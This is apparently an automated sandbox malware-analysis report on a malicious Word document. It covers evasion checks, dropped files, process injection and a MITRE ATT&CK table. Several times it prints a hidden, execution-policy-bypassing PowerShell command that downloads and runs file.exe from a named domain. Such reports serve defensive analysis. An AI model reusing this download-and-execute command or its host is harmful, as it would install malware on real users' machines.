Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\file.exeRDTSC instruction interceptor: First address: 0000000007043C85 second address: 0000000007043C85 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4EECA62E1Fh 0x00000006 test ch, FFFFFFD8h 0x00000009 test edx, D75238D0h 0x0000000f inc ebp 0x00000010 test ecx, edx 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1580Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1696Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 912Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004027AA FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004027AA FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: file.exe, 00000015.00000002.1283718581.00000000005D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Injects files into Windows application
Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT VolumeInformation
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Scripting		Boot or Logon Initialization Scripts111
Process Injection		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		Exfiltration Over Bluetooth2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Native API		Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Shared Modules		Logon Script (Mac)Logon Script (Mac)1
Access Token Manipulation		NTDS1
